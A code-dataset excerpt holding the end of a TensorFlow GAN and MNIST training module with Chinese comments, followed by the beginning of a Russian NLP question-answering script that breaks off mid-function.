tf.maximum(x, alpha * x, name=name)\n\n\ndef tf_gan(epochs=3):\n\n # 设定log目录\n log_dir = os.path.join(datas_path, 'gan_mnist', 'log')\n\n # 加载数据\n from tensorflow.examples.tutorials.mnist import input_data\n mnist = input_data.read_data_sets(train_dir=MNIST_DIR)\n # return mnist\n\n # 初始化图\n tf.reset_default_graph()\n\n # 模型输入\n def model_inputs(real_dim, z_dim):\n # ???为什么shape是两维,但其中一维是None呢?难道输入的不是一张张宽高确定的图片吗?\n # 因为 mnist数据集每张图是28x28,被调整为784,高度和宽度被合并成一维。\n inputs_real = tf.placeholder(dtype=tf.float32, shape=[None, real_dim], name='input_real')\n inputs_z = tf.placeholder(dtype=tf.float32, shape=[None, z_dim], name='input_z')\n\n return inputs_real, inputs_z\n\n # 生成器\n def generator(z, out_dim, n_units=128, reuse=False, alpha=0.01):\n ''' Build the generator network.\n\n Arguments\n ---------\n z : Input tensor for the generator\n out_dim : Shape of the generator output\n n_units : Number of units in hidden layer\n reuse : Reuse the variables with tf.variable_scope\n alpha : leak parameter for leaky ReLU\n\n Returns\n -------\n out:\n '''\n with tf.variable_scope('generator', reuse=reuse): # finish this\n # Hidden layer\n # 隐藏层没有激活函数,只是一个线性输出。自行用 leaky relu 计算激活\n # 形状: inputs -> units\n h1 = tf.layers.dense(inputs=z, units=n_units, activation=None)\n # Leaky ReLU\n h1 = tf.maximum(alpha * h1, h1)\n\n # Logits and tanh output\n # tf.layers.dense 参数默认值: activation=None\n logits = tf.layers.dense(inputs=h1, units=out_dim, activation=None)\n out = tf.tanh(logits)\n\n tf.summary.histogram('leaky_relu', h1)\n tf.summary.histogram('out_tanh', out)\n\n return out\n\n # 鉴别器\n def discriminator(x, n_units=128, reuse=False, alpha=0.01):\n ''' Build the discriminator network.\n\n Arguments\n ---------\n x : Input tensor for the discriminator\n n_units: Number of units in hidden layer\n reuse : Reuse the variables with tf.variable_scope\n alpha : leak parameter for leaky ReLU\n\n Returns\n -------\n out, logits:\n '''\n with tf.variable_scope('discriminator', reuse=reuse): # finish this\n # Hidden layer\n h1 = tf.layers.dense(inputs=x, units=n_units, activation=None)\n # Leaky ReLU\n h1 = tf.maximum(alpha * h1, h1)\n\n # dense函数应该是可以直接指定激活的,但此处需要返回线性的logits和激活后的out所以就分开写了。\n logits = tf.layers.dense(inputs=h1, units=1, activation=None)\n out = tf.sigmoid(logits)\n\n if reuse is False:\n tf.summary.histogram('leaky_relu', h1)\n tf.summary.histogram('logits', logits)\n tf.summary.histogram('out_sigmoid', out)\n\n return out, logits\n\n\n def generator_sample():\n # 加载所有生成器有关的参数。\n saver = tf.train.Saver(var_list=g_vars)\n with tf.Session() as sess:\n # 加载最后的训练的权重值到图Session\n saver.restore(sess, tf.train.latest_checkpoint(checkpoint_dir=checkpoints_dir))\n\n # 生成16个样品噪点,得到16个假图。\n sample_z = np.random.uniform(-1, 1, size=(16, Z_NOISE_SIZE))\n gen_samples = sess.run(\n generator(input_z, input_size, n_units=G_HIDDEN_SIZE, reuse=True, alpha=LEAKY_RELU_ALPHA),\n feed_dict={input_z: sample_z}\n )\n view_samples(0, [gen_samples])\n\n\n # Create our input placeholders\n # input_size = 784, z_size = 100\n input_real, input_z = model_inputs(real_dim=input_size, z_dim=Z_NOISE_SIZE)\n\n # Generator network here\n # 用 100 个噪点, 通过 g_hidden_size 的dense网络,生成 input_size 的图像。\n g_model = generator(z=input_z, out_dim=input_size, n_units=G_HIDDEN_SIZE, alpha=LEAKY_RELU_ALPHA)\n\n # Disriminator network here\n # 用真图训练鉴别器。\n _, d_logits_real = discriminator(x=input_real, n_units=D_HIDDEN_SIZE, alpha=LEAKY_RELU_ALPHA)\n # return _, d_logits_real\n\n # 鉴别器的权重参数是经过真图训练的,\n # 如果把假图塞入鉴别器,把标注置1,硬说是真图。\n # 
那么鉴别器的loss就能反映这个假图到底有多真了。\n _, d_logits_fake = discriminator(x=g_model, reuse=True, n_units=D_HIDDEN_SIZE, alpha=LEAKY_RELU_ALPHA)\n g_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(\n logits=d_logits_fake, labels=tf.ones_like(d_logits_fake)\n )\n )\n\n # # Calculate losses\n # 标签平滑化。真图的标注全部都是0.9, 鉴别器的参数调整就向着0.9进行。\n d_loss_real = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(\n logits=d_logits_real, labels=tf.ones_like(d_logits_real) * (1 - smooth)\n )\n )\n\n d_loss_fake = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(\n logits=d_logits_fake, labels=tf.zeros_like(d_logits_real)\n # logits=d_logits_fake, labels=tf.zeros_like(d_logits_fake)\n )\n )\n\n # 鉴别器的损失,就是真损失和假损失之和。\n # 因为流程上把数据分开了两类塞进鉴别器。\n # 首先塞一批真图,去训练鉴别器的权重参数\n # 然后再塞一批假图,用真图的权重参数来结算,得到的loss用来调整假图生成器。\n # 鉴别器的真实水平是由两方面判断的:\n # 1,真图看成假图, 2.假图看成真图。\n # 所以要将两部分的loss相加。\n # keras有跟好的方法,就是同时塞真假数据进去,就不用这么尴尬了。\n\n d_loss = d_loss_real + d_loss_fake\n\n # Get the trainable_variables, split into G and D parts\n t_vars = tf.trainable_variables()\n g_vars = [var for var in t_vars if var.name.startswith('generator')]\n d_vars = [var for var in t_vars if var.name.startswith('discriminator')]\n\n d_train_opt = tf.train.AdamOptimizer(LEARNING_RATE).minimize(d_loss, var_list=d_vars)\n g_train_opt = tf.train.AdamOptimizer(LEARNING_RATE).minimize(g_loss, var_list=g_vars)\n\n\n # summary 是独立运行的一个op\n tf.summary.scalar('g_loss', g_loss)\n tf.summary.scalar('d_loss', d_loss)\n # max_outputs:为其生成图像的批次元素的最大数量。\n # 塞给summary.images的是一批张量,所以要指定这批张量中要输出多少张图片。\n # 只在一批里输出一张图\n tf.summary.image(\n name='g_model',\n max_outputs=1,\n tensor=tf.reshape(g_model, [-1, 28, 28, 1])\n )\n\n # train\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n merged = tf.summary.merge_all() # 将图形、训练过程等数据合并在一起\n log = tools.tf.DsTfLog(log_dir=log_dir, graph=sess.graph)\n\n for e in tqdm.tqdm(range(epochs)):\n\n print('训练数据遍历 {}/{} 代'.format(e+1, epochs))\n\n for ii in range(mnist.train.num_examples // BATCH_SIZE):\n batch = mnist.train.next_batch(BATCH_SIZE)\n\n # Get images, reshape and rescale to pass to D\n # batch 是一个tuple, (img, label),\n # 其中,img.shape:(128,784), lable.shape:(128,)\n batch_images = batch[0].reshape((BATCH_SIZE, 784))\n\n # 图像进行值缩放。\n batch_images = batch_images * 2 - 1\n\n # Sample random noise for G\n # 生成噪点\n batch_z = np.random.uniform(-1, 1, size=(BATCH_SIZE, Z_NOISE_SIZE))\n\n fd ={input_real: batch_images, input_z: batch_z}\n\n # d_train_opt 是优化器,优化器运行之后是不会有返回值的。\n _ = sess.run(d_train_opt, feed_dict=fd)\n _ = sess.run(g_train_opt, feed_dict={input_z: batch_z})\n\n # At the end of each epoch, get the losses and print them out\n # 在训练完一代数据之后, 运行一次摘要。\n # 摘要 m 是所有要输出到tensorboard的数据,一大坨的byte,无法直观显示。\n m = sess.run(\n merged,\n feed_dict={input_z: batch_z, input_real: batch_images}\n )\n log.writer.add_summary(m, e)\n\n # print(\n # #\"Epoch {}/{}...\".format(e + 1, epochs),\n # \"Discriminator Loss: {:.4f}...\".format(dloss),\n # # \"Generator Loss: {:.4f}\".format(train_loss_g)\n # )\n\n # Sample from generator as we're training for viewing afterwards\n # sample_z = np.random.uniform(-1, 1, size=(16, z_size))\n # gen_samples = sess.run(\n # generator(input_z, input_size, n_units=g_hidden_size, reuse=True, alpha=alpha),\n # feed_dict={input_z: sample_z}\n # )\n #samples.append(gen_samples)\n\n saver = tf.train.Saver(var_list=g_vars)\n saver.save(sess, log_dir)\n\n # # Save training generator samples\n # with open(sample_path, 'wb') as f:\n # pkl.dump(samples, f)\n #\n # 
generator_sample()\n\n print('运行 tensorboard 命令:')\n print('python -m tensorflow.tensorboard --host=localhost --logdir=%s' % log_dir)\n\n return mnist\n\n\ndef get_image(image_path, width, height, mode):\n \"\"\"\n Read image from image_path\n :param image_path: Path of image\n :param width: Width of image\n :param height: Height of image\n :param mode: Mode of image\n :return: Image data\n \"\"\"\n image = pil.Image.open(image_path)\n\n if image.size != (width, height): # HACK - Check if image is from the CELEBA dataset\n # Remove most pixels that aren't part of a face\n # celeba 的图像大小,高218,宽178,通道3\n # image.size = (178,218)\n face_width = face_height = 108\n j = (image.size[0] - face_width) // 2\n i = (image.size[1] - face_height) // 2\n # 裁剪图像,crop(起始坐标x,起始坐标y,宽,高) 以左上角为起始。\n image = image.crop([j, i, j + face_width, i + face_height])\n image = image.resize([width, height], pil.Image.BILINEAR)\n\n return np.array(image.convert(mode))\n\n\ndef tf_celeba():\n\n # 设定log目录\n log_dir = os.path.join(datas_path, 'gan_celeba', 'log')\n\n def model_inputs(image_width, image_height, image_channels, z_dim):\n \"\"\"\n Create the model inputs\n :param image_width: The input image width\n :param image_height: The input image height\n :param image_channels: The number of image channels\n :param z_dim: The dimension of Z\n :return: Tuple of (tensor of real input images, tensor of z data, learning rate)\n \"\"\"\n input_real = tf.placeholder(tf.float32, [None, image_width, image_height, image_channels], \"input_real\")\n input_z = tf.placeholder(tf.float32, [None, z_dim], \"input_z\")\n learning_rate = tf.placeholder(tf.float32, None, \"learning_rate\")\n\n return input_real, input_z, learning_rate\n\n def LeakyReLU(x, alpha=0.2):\n return tf.maximum(alpha * x, x)\n\n def discriminator(images, reuse=False, alpha=0.01):\n \"\"\"\n Create the discriminator network\n :param image: Tensor of input image(s)\n :param reuse: Boolean if the weights should be reused\n :return: Tuple of (tensor output of the discriminator, tensor logits of the discriminator)\n \"\"\"\n leaky_relu = lambda x: tf.maximum(alpha * x, x)\n\n def conv(inputs, filters, batch_norm=True):\n outputs = tf.layers.conv2d(inputs, filters, 5, 2, 'same')\n if batch_norm:\n outputs = tf.layers.batch_normalization(outputs, training=True)\n return leaky_relu(outputs)\n\n with tf.variable_scope(\"discriminator\", reuse=reuse):\n # input 28*28*3\n x1 = conv(images, 64, batch_norm=False) # 14*14*64\n x2 = conv(x1, 128) # 7*7*128\n x3 = conv(x2, 256) # 4*4*256\n\n flat = tf.reshape(x3, (-1, 4 * 4 * 256))\n logits = tf.layers.dense(flat, 1)\n out = tf.sigmoid(logits)\n\n return out, logits\n\n def generator(z, out_channel_dim, is_train=True, alpha=0.01):\n \"\"\"\n Create the generator network\n :param z: Input z\n :param out_channel_dim: The number of channels in the output image\n :param is_train: Boolean if generator is being used for training\n :return: The tensor output of the generator\n \"\"\"\n leaky_relu = lambda x: tf.maximum(alpha * x, x)\n with tf.variable_scope(\"generator\", reuse=not is_train):\n x1 = tf.layers.dense(z, 7 * 7 * 512)\n x1 = tf.reshape(x1, (-1, 7, 7, 512))\n x1 = tf.layers.batch_normalization(x1, training=is_train)\n x1 = leaky_relu(x1)\n # 7*7*512\n\n x2 = tf.layers.conv2d_transpose(x1, 256, 5, 1, 'SAME')\n x2 = tf.layers.batch_normalization(x2, training=is_train)\n x2 = leaky_relu(x2)\n # 7*7*256\n\n x3 = tf.layers.conv2d_transpose(x2, 128, 5, 2, 'SAME')\n x3 = tf.layers.batch_normalization(x3, training=is_train)\n x3 = 
leaky_relu(x3)\n # 14*14*128\n\n logits = tf.layers.conv2d_transpose(x3, out_channel_dim, 5, 2, 'SAME')\n out = tf.tanh(logits)\n # 28*28*out_channel_dim\n return out\n\n def model_loss(input_real, input_z, out_channel_dim, alpha=0.9):\n \"\"\"\n Get the loss for the discriminator and generator\n :param input_real: Images from the real dataset\n :param input_z: Z input\n :param out_channel_dim: The number of channels in the output image\n :return: A tuple of (discriminator loss, generator loss)\n \"\"\"\n g_model = generator(input_z, out_channel_dim)\n d_model_real, d_logits_real = discriminator(input_real)\n d_model_fake, d_logits_fake = discriminator(g_model, reuse=True)\n\n d_loss_real = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_real, labels=tf.ones_like(d_logits_real) * alpha))\n d_loss_fake = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_fake, labels=tf.zeros_like(d_logits_fake)))\n g_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_fake, labels=tf.ones_like(d_logits_fake)))\n\n d_loss = d_loss_real + d_loss_fake\n\n return d_loss, g_loss\n\n def model_opt(d_loss, g_loss, learning_rate, beta1):\n \"\"\"\n Get optimization operations\n :param d_loss: Discriminator loss Tensor\n :param g_loss: Generator loss Tensor\n :param learning_rate: Learning Rate Placeholder\n :param beta1: The exponential decay rate for the 1st moment in the optimizer\n :return: A tuple of (discriminator training operation, generator training operation)\n \"\"\"\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n\n with tf.control_dependencies(update_ops):\n t_vars = tf.trainable_variables()\n\n d_vars = [var for var in t_vars if var.name.startswith('discriminator')]\n g_vars = [var for var in t_vars if var.name.startswith('generator')]\n\n d_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(d_loss, var_list=d_vars)\n g_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(g_loss, var_list=g_vars)\n\n return d_train_opt, g_train_opt\n\n def show_generator_output(sess, n_images, input_z, out_channel_dim, image_mode):\n \"\"\"\n Show example output for the generator\n :param sess: TensorFlow session\n :param n_images: Number of Images to display\n :param input_z: Input Z Tensor\n :param out_channel_dim: The number of channels in the output image\n :param image_mode: The mode to use for images (\"RGB\" or \"L\")\n \"\"\"\n cmap = None if image_mode == 'RGB' else 'gray'\n z_dim = input_z.get_shape().as_list()[-1]\n example_z = np.random.uniform(-1, 1, size=[n_images, z_dim])\n\n samples = sess.run(\n generator(input_z, out_channel_dim, False),\n feed_dict={input_z: example_z})\n\n images_grid = images_square_grid(samples, image_mode)\n plt.imshow(images_grid, cmap=cmap)\n # pyplot.show()\n\n def images_square_grid(images, mode):\n \"\"\"\n Save images as a square grid\n :param images: Images to be used for the grid\n :param mode: The mode to use for images\n :return: Image of images in a square grid\n \"\"\"\n # Get maximum size for square grid of images\n save_size = int(np.floor(np.sqrt(images.shape[0])))\n\n # Scale to 0-255\n images = (((images - images.min()) * 255) / (images.max() - images.min())).astype(np.uint8)\n\n # Put images in a square arrangement\n images_in_square = np.reshape(\n images[:save_size * save_size],\n (save_size, save_size, images.shape[1], images.shape[2], images.shape[3]))\n if mode == 'L':\n images_in_square = np.squeeze(images_in_square, 4)\n\n # 
Combine images to grid image\n new_im = pil.Image.new(mode, (images.shape[1] * save_size, images.shape[2] * save_size))\n for col_i, col_images in enumerate(images_in_square):\n for image_i, image in enumerate(col_images):\n im = pil.Image.fromarray(image, mode)\n new_im.paste(im, (col_i * images.shape[1], image_i * images.shape[2]))\n\n return new_im\n\n def train(epoch_count, batch_size, z_dim, learning_rate, beta1, get_batches, data_shape, data_image_mode):\n \"\"\"\n Train the GAN\n :param epoch_count: Number of epochs\n :param batch_size: Batch Size\n :param z_dim: Z dimension\n :param learning_rate: Learning Rate\n :param beta1: The exponential decay rate for the 1st moment in the optimizer\n :param get_batches: Function to get batches\n :param data_shape: Shape of the data\n :param data_image_mode: The image mode to use for images (\"RGB\" or \"L\")\n \"\"\"\n input_real, input_z, lr = model_inputs(data_shape[1], data_shape[2], data_shape[3], z_dim)\n\n d_loss, g_loss = model_loss(input_real, input_z, data_shape[3])\n\n d_opt, g_opt = model_opt(d_loss, g_loss, lr, beta1)\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n log = tools.tf.DsTfLog(log_dir=log_dir, graph=sess.graph)\n\n for epoch_i in range(epoch_count):\n steps = 0\n\n for batch_images in get_batches(batch_size):\n\n steps += 1\n batch_images = batch_images * 2\n print('batche_images type:{}, shape:{} min:{} max:{}'.format(\n type(batch_images), batch_images.shape, np.min(batch_images), np.max(batch_images))\n )\n\n batch_z = np.random.uniform(-1, 1, size=(batch_size, z_dim))\n # Run optimizers\n _ = sess.run(d_opt, feed_dict={input_real: batch_images, input_z: batch_z, lr: learning_rate})\n _ = sess.run(g_opt, feed_dict={input_real: batch_images, input_z: batch_z, lr: learning_rate})\n\n if steps % 10 == 0:\n train_loss_d = d_loss.eval({input_real: batch_images, input_z: batch_z})\n train_loss_g = g_loss.eval({input_z: batch_z})\n\n print(\"Epoch {}/{}...\".format(epoch_i + 1, epochs),\n \"Batch {}...\".format(steps),\n \"Discriminator Loss: {:.4f}...\".format(train_loss_d),\n \"Generator Loss: {:.4f}\".format(train_loss_g))\n\n # if steps % 2 == 0:\n\n # show_generator_output(sess, show_n_images, input_z, data_shape[3], data_image_mode)\n cmap = None if data_image_mode == 'RGB' else 'gray'\n z_dim = input_z.get_shape().as_list()[-1]\n example_z = np.random.uniform(-1, 1, size=[show_n_images, z_dim])\n\n samples = sess.run(\n generator(input_z, data_shape[3], False),\n feed_dict={input_z: example_z}\n )\n print('samples type:{}, shape:{}, min:{}, max:{}'.format(type(samples), samples.shape, np.min(samples), np.max(samples)))\n\n images_grid = np.array(images_square_grid(samples, data_image_mode))\n print('images_grid type:{}, shape:{}, min:{}, max:{}'.format(type(images_grid), images_grid.shape, np.min(images_grid), np.max(images_grid)))\n\n log.log_images('img', images_grid.reshape(-1, *images_grid.shape), step=steps)\n\n if steps % 30 == 0:\n return\n\n def get_batch(image_files, width, height, mode):\n data_batch = np.array(\n [get_image(sample_file, width, height, mode) for sample_file in image_files]).astype(np.float32)\n\n # Make sure the images are in 4 dimensions\n if len(data_batch.shape) < 4:\n data_batch = data_batch.reshape(data_batch.shape + (1,))\n\n return data_batch\n\n class Dataset(object):\n \"\"\"\n Dataset\n \"\"\"\n\n def __init__(self, dataset_name, data_files):\n \"\"\"\n Initalize the class\n :param dataset_name: Database name\n :param data_files: List of files in 
the database\n \"\"\"\n DATASET_CELEBA_NAME = 'celeba'\n DATASET_MNIST_NAME = 'mnist'\n IMAGE_WIDTH = 28\n IMAGE_HEIGHT = 28\n\n if dataset_name == DATASET_CELEBA_NAME:\n self.image_mode = 'RGB'\n image_channels = 3\n\n elif dataset_name == DATASET_MNIST_NAME:\n self.image_mode = 'L'\n image_channels = 1\n\n self.data_files = data_files\n self.shape = len(data_files), IMAGE_WIDTH, IMAGE_HEIGHT, image_channels\n\n def get_batches(self, batch_size):\n \"\"\"\n Generate batches\n :param batch_size: Batch Size\n :return: Batches of data\n \"\"\"\n IMAGE_MAX_VALUE = 255\n\n current_index = 0\n while current_index + batch_size <= self.shape[0]:\n data_batch = get_batch(\n self.data_files[current_index:current_index + batch_size],\n *self.shape[1:3],\n self.image_mode\n )\n\n current_index += batch_size\n\n yield data_batch / IMAGE_MAX_VALUE - 0.5\n\n batch_size = 128\n z_dim = 100\n learning_rate = 0.0001\n beta1 = 0.5\n epochs = 1\n show_n_images = 25\n\n data_dir = './data'\n celeba_dir = os.path.join(parent_module['datas path'], 'gan_datas', 'img_align_celeba',)\n celeba_dataset = Dataset('celeba', glob.glob(os.path.join(celeba_dir, '*.jpg')))\n\n # mnist_dir = os.path.join(parent_module['datas path'], 'gan_datas', 'mnist',)\n # mnist_dataset = Dataset('mnist', glob.glob(os.path.join(mnist_dir, '*.jpg')))\n\n dts = celeba_dataset\n\n print(dts.data_files[0])\n return dts\n\n # return celeba_dataset\n\n with tf.Graph().as_default():\n train(epochs, batch_size, z_dim, learning_rate, beta1, dts.get_batches,\n dts.shape, dts.image_mode)\n\n\ndef tf_mnist():\n print('tf_mnist')\n tf.logging.set_verbosity(tf.logging.INFO)\n\n def cnn_model_fn(features, labels, mode):\n \"\"\"Model function for CNN.\"\"\"\n # Input Layer\n # Reshape X to 4-D tensor: [batch_size, width, height, channels]\n # MNIST images are 28x28 pixels, and have one color channel\n input_layer = tf.reshape(features[\"x\"], [-1, 28, 28, 1])\n\n # Convolutional Layer #1\n # Computes 32 features using a 5x5 filter with ReLU activation.\n # Padding is added to preserve width and height.\n # Input Tensor Shape: [batch_size, 28, 28, 1]\n # Output Tensor Shape: [batch_size, 28, 28, 32]\n conv1 = tf.layers.conv2d(\n inputs=input_layer,\n filters=32,\n kernel_size=[5, 5],\n padding=\"same\",\n activation=tf.nn.relu)\n\n # Pooling Layer #1\n # First max pooling layer with a 2x2 filter and stride of 2\n # Input Tensor Shape: [batch_size, 28, 28, 32]\n # Output Tensor Shape: [batch_size, 14, 14, 32]\n pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2)\n\n # Convolutional Layer #2\n # Computes 64 features using a 5x5 filter.\n # Padding is added to preserve width and height.\n # Input Tensor Shape: [batch_size, 14, 14, 32]\n # Output Tensor Shape: [batch_size, 14, 14, 64]\n conv2 = tf.layers.conv2d(\n inputs=pool1,\n filters=64,\n kernel_size=[5, 5],\n padding=\"same\",\n activation=tf.nn.relu)\n\n # Pooling Layer #2\n # Second max pooling layer with a 2x2 filter and stride of 2\n # Input Tensor Shape: [batch_size, 14, 14, 64]\n # Output Tensor Shape: [batch_size, 7, 7, 64]\n pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)\n\n # Flatten tensor into a batch of vectors\n # Input Tensor Shape: [batch_size, 7, 7, 64]\n # Output Tensor Shape: [batch_size, 7 * 7 * 64]\n pool2_flat = tf.reshape(pool2, [-1, 7 * 7 * 64])\n\n # Dense Layer\n # Densely connected layer with 1024 neurons\n # Input Tensor Shape: [batch_size, 7 * 7 * 64]\n # Output Tensor Shape: [batch_size, 1024]\n dense = 
tf.layers.dense(inputs=pool2_flat, units=1024, activation=tf.nn.relu)\n\n # Add dropout operation; 0.6 probability that element will be kept\n dropout = tf.layers.dropout(\n inputs=dense, rate=0.4, training=mode == tf.estimator.ModeKeys.TRAIN)\n\n # Logits layer\n # Input Tensor Shape: [batch_size, 1024]\n # Output Tensor Shape: [batch_size, 10]\n logits = tf.layers.dense(inputs=dropout, units=10)\n\n predictions = {\n # Generate predictions (for PREDICT and EVAL mode)\n \"classes\": tf.argmax(input=logits, axis=1),\n # Add `softmax_tensor` to the graph. It is used for PREDICT and by the\n # `logging_hook`.\n \"probabilities\": tf.nn.softmax(logits, name=\"softmax_tensor\")\n }\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n # Calculate Loss (for both TRAIN and EVAL modes)\n onehot_labels = tf.one_hot(indices=tf.cast(labels, tf.int32), depth=10)\n loss = tf.losses.softmax_cross_entropy(\n onehot_labels=onehot_labels, logits=logits)\n\n # Configure the Training Op (for TRAIN mode)\n if mode == tf.estimator.ModeKeys.TRAIN:\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)\n train_op = optimizer.minimize(\n loss=loss,\n global_step=tf.train.get_global_step())\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n\n # Add evaluation metrics (for EVAL mode)\n eval_metric_ops = {\n \"accuracy\": tf.metrics.accuracy(\n labels=labels, predictions=predictions[\"classes\"])}\n return tf.estimator.EstimatorSpec(\n mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\n # Load training and eval data\n # mnist = tf.contrib.learn.datasets.load_dataset(MNIST_DIR)\n from tensorflow.examples.tutorials.mnist.input_data import read_data_sets\n mnist= read_data_sets(train_dir=MNIST_DIR)\n\n train_data = mnist.train.images # Returns np.array\n train_labels = np.asarray(mnist.train.labels, dtype=np.int32)\n eval_data = mnist.test.images # Returns np.array\n eval_labels = np.asarray(mnist.test.labels, dtype=np.int32)\n\n\n # Create the Estimator\n mnist_classifier = tf.estimator.Estimator(\n model_fn=cnn_model_fn, model_dir=\"/tmp/mnist_convnet_model\")\n\n # Set up logging for predictions\n # Log the values in the \"Softmax\" tensor with label \"probabilities\"\n tensors_to_log = {\"probabilities\": \"softmax_tensor\"}\n logging_hook = tf.train.LoggingTensorHook(\n tensors=tensors_to_log, every_n_iter=50)\n\n # Train the model\n train_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": train_data},\n y=train_labels,\n batch_size=100,\n num_epochs=None,\n shuffle=True)\n\n mnist_classifier.train(\n input_fn=train_input_fn,\n steps=20000,\n hooks=[logging_hook])\n\n # Evaluate the model and print results\n eval_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": eval_data},\n y=eval_labels,\n num_epochs=1,\n shuffle=False)\n\n eval_results = mnist_classifier.evaluate(input_fn=eval_input_fn)\n\n print(eval_results)","sub_path":"DsDeepLearning/c05_GAN/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":62768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"254545552","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom json import load\nfrom json import dumps\nfrom pymystem3 import Mystem\nfrom rutermextract import TermExtractor as TE\nfrom nltk.tokenize import WordPunctTokenizer as WPT\nimport pymorphy2\n\n# Парсим текст. 
На вход подается текст.\ndef tokenize(sentences):\n\tarr = []\n\tmorph = pymorphy2.MorphAnalyzer()\n\tterm_extractor = TermExtractor()\n\tfor sent in nltk.sent_tokenize(sentences.lower()):\n\t\tfor term in term_extractor(sent):\n\t\t\tarr.append(term.normalized)\n\t\t\tprint (term.normalized, term.count)\n\t\tfor word in nltk.word_tokenize(sent):\n\t\t\tp = morph.parse(word)[0]\n\t\t\tv = p.tag.POS\n\t\t\tif v == 'VERB':\n\t\t\t\tarr.append(word)\n\t\t\t\tprint (word)\n\treturn arr\n\n# Попытка поиска однородных членов предложения\ndef odnorodn(term, v):\n\tif v == 'ADJF' or v == 'ADJS' or v == 'ADVB':\n\t\tif v in term:\n\t\t\tprint (v)\n\ndef compare_phrase(P1, P2):\n\tword_tokenizer = WPT()\n\n\twords1 = word_tokenizer.tokenize(P1)\n\twords2 = word_tokenizer.tokenize(P2)\n\n\tP = 1.0\n\tfor i in range(max(len(words1),len(words2))):\n\t\tp = {-1:1, 0:1, 1:1}\n\t\tfor j in p.keys():\n\t\t\ttry:\n\t\t\t\tp[j] *= compare(words1[i], words2[i+j])\n\t\t\texcept IndexError:\n\t\t\t\tp[j] = 0\n\t\tP *= max(p.values())\n\n\treturn P\n\ndef compare(S1,S2):\n\tngrams = [S1[i:i+3] for i in range(len(S1))]\n\tcount = 0\n\tfor ngram in ngrams:\n\t\tcount += S2.count(ngram)\n\n\treturn count/max(len(S1), len(S2))\n\ndef load_data(filename = 'data.json'):\n\tmystem = Mystem()\n\tknowledge = {}\n\tsignificats = {}\n\ttry:\n\t\tkb = load(open(filename))\n\t\tfor _ in kb.keys():\n\t\t\tpairs = kb[_]\n\t\t\tfor pair in pairs:\n\t\t\t\td1 = pair['denotat1']\n\t\t\t\td2 = pair['denotat2']\n\t\t\t\trl = pair['relation']\n\t\t\t\tlnk = ()\n\t\t\t\tfor d in [d1, rl, d2]:\n\t\t\t\t\tkey = ''\n\t\t\t\t\tval = []\n\t\t\t\t\tprt = ''\n\t\t\t\t\tfor a in mystem.analyze(d):\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tkey += a['analysis'][0]['lex']\n\t\t\t\t\t\t\tval += a['analysis']\n\t\t\t\t\t\t\tprt += a['analysis'][0]['lex']\n\t\t\t\t\t\texcept KeyError:\n\t\t\t\t\t\t\tkey += a['text']\n\t\t\t\t\t\t\tprt += a['text']\n\t\t\t\t\t\texcept IndexError:\n\t\t\t\t\t\t\tkey += a['text']\n\t\t\t\t\t\t\tprt += a['text']\n\t\t\t\t\tsignificats.update({key.strip('\\n'):val})\n\t\t\t\t\tlnk += tuple([prt.strip('\\n')])\n\t\t\t\ttry:\n\t\t\t\t\tknowledge[lnk] += 1\n\t\t\t\texcept KeyError:\n\t\t\t\t\tknowledge.update({lnk:1})\n\texcept FileNotFoundError as fnfe:\n\t\tpass\n\treturn [significats, knowledge]\n\ndef load_q(filename = 'test.json'):\n\ttry:\n\t\treturn load(open(filename))\n\texcept FileNotFoundError as fnfe:\n\t\treturn {}\n\ndef load_key(filename = 'key.json'):\n\ttry:\n\t\treturn load(open(filename))\n\texcept FileNotFoundError as fnfe:\n\t\treturn {}\n\ndef check_key(ans, key):\n\tc = 0\n\tw = 0\n\tfor q in key.keys():\n\t\te = False\n\t\tfor a in key[q].keys():\n\t\t\tif key[q][a] != ans[q][a][0]:\n\t\t\t\tprint(q, \"\\n\", key[q], ans[q])\n\t\t\t\te = True\n\t\tif e:\n\t\t\tw += 1\n\t\telse:\n\t\t\tc += 1\n\tprint(c, w)\n\ndef answer(knowledge = {}, questions = {}):\n\tmystem = Mystem()\n\tterm_extractor = TE()\n\n\tdef is_negative(text):\n\t\tfor a in mystem.analyze(text):\n\t\t\tfor rez in get_analysis(a):\n\t\t\t\tif (rez['gr'] == 'PART=' and rez['lex'] == 'не'):\n\t\t\t\t\treturn -1\n\t\treturn 1\n\n\tdef get_analysis(mystem_result):\n\t\t\ttry:\n\t\t\t\treturn mystem_result['analysis']\n\t\t\texcept KeyError:\n\t\t\t\treturn []\n\n\n\tdef get_significat_keys(terms):\n\t\tsignificat_keys = ()\n\t\tfor term in terms:\n\t\t\tsignificat_key = ''\n\t\t\tfor analysis in mystem.analyze(term):\n\t\t\t\tfor rez in get_analysis(analysis):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tsignificat_key += rez['lex'] + \" \"\n\t\t\t\t\texcept 
